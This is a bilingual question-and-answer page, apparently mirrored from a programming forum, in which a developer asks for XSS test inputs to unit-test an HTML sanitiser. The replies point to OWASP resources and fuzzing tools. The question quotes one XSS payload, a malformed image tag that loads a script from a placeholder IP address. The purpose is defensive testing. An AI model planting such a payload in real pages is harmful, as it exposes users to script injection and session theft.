XSS 酷刑测试 - 它存在吗?
我正在寻找编写一个 html 清理程序,显然为了测试/证明它可以正常工作,我需要一组 XSS 示例来对抗它,看看它的性能如何。 这是一个 来自 Coding Horror 的好例子
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
我知道有一个 Mime Torture Test 其中包含几封带有附件的嵌套电子邮件,用于测试 Mime 解码器(如果他们可以正确解码它,然后他们就被证明可以工作)。 我基本上是在寻找 XSS 的等效项,即一个狡猾的 html 示例列表,我可以将其扔到我的消毒程序中,以确保它正常工作。
如果任何人也有关于如何编写消毒剂的任何好的资源(即人们尝试使用的常见漏洞等),他们也将不胜感激。
提前致谢:-)
编辑:抱歉,如果之前不清楚,但我经过了一系列折磨测试,这样我就可以为消毒剂编写单元测试,而不是在浏览器中测试它,等等。理论上的源数据可能来自任何地方 - 不仅仅是浏览器。
I'm looking to write a html sanitiser, and obviously to test/prove that it works properly, I need a set of XSS examples to pitch against it to see how it performs. Here's a nice example from Coding Horror
<img src=""http://www.a.com/a.jpg<script type=text/javascript
src="http://1.2.3.4:81/xss.js">" /><<img
src=""http://www.a.com/a.jpg</script>"
I know there's a Mime Torture Test which comprises of several nested emails with attachments that's used to test Mime decoders (if they can decode it properly, then they've been proven to work). I'm basically looking for an equivilent for XSS, i.e. a list of examples of dodgy html that I can throw at my sanitiser just to make sure it works OK.
If anyone also has any good resources on how to write the sanitiser (i.e. what common exploits people try to use, etc) they'd be gratefully received too.
Thanks in advance :-)
Edit: Sorry if this wasn't clear before, but I was after a set of torture tests so I can write unit tests for the sanitiser, not test it in the browser, etc. The source data in theory may have come from anywhere - not just a browser.
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(4)
看看这个 XSS 作弊列表: https://www.owasp.org/index.php /XSS_Filter_Evasion_Cheat_Sheet
Take a look at this XSS Cheat List : https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
XSS Me 是一个很棒的 Firefox 插件,你可以在你的消毒剂上运行。
XSS Me is a great Firefox plugin you can run against your sanitizer.
查看 OWASP。 他们对 XSS 的工作原理、寻找内容,甚至 WebGoat 项目,您可以在其中尝试访问易受攻击的站点。
Check out OWASP. They have good guidance on how XSS works, what to look for, and even the WebGoat project, where you can try your hand on a vulnerable site.
您可以尝试 Jesse Ruderman 的 jsfunfuzz (http://www.squarefree.com/ 2007/08/02/introducing-jsfunfuzz/) 向您的 Javascript 抛出随机数据并试图破坏它。 看来 Firefox 团队在使用这一点方面取得了巨大成功。
You might try Jesse Ruderman's jsfunfuzz (http://www.squarefree.com/2007/08/02/introducing-jsfunfuzz/) that throws random data at your Javascript trying to break it. It seems the Firefox team has used this with great success.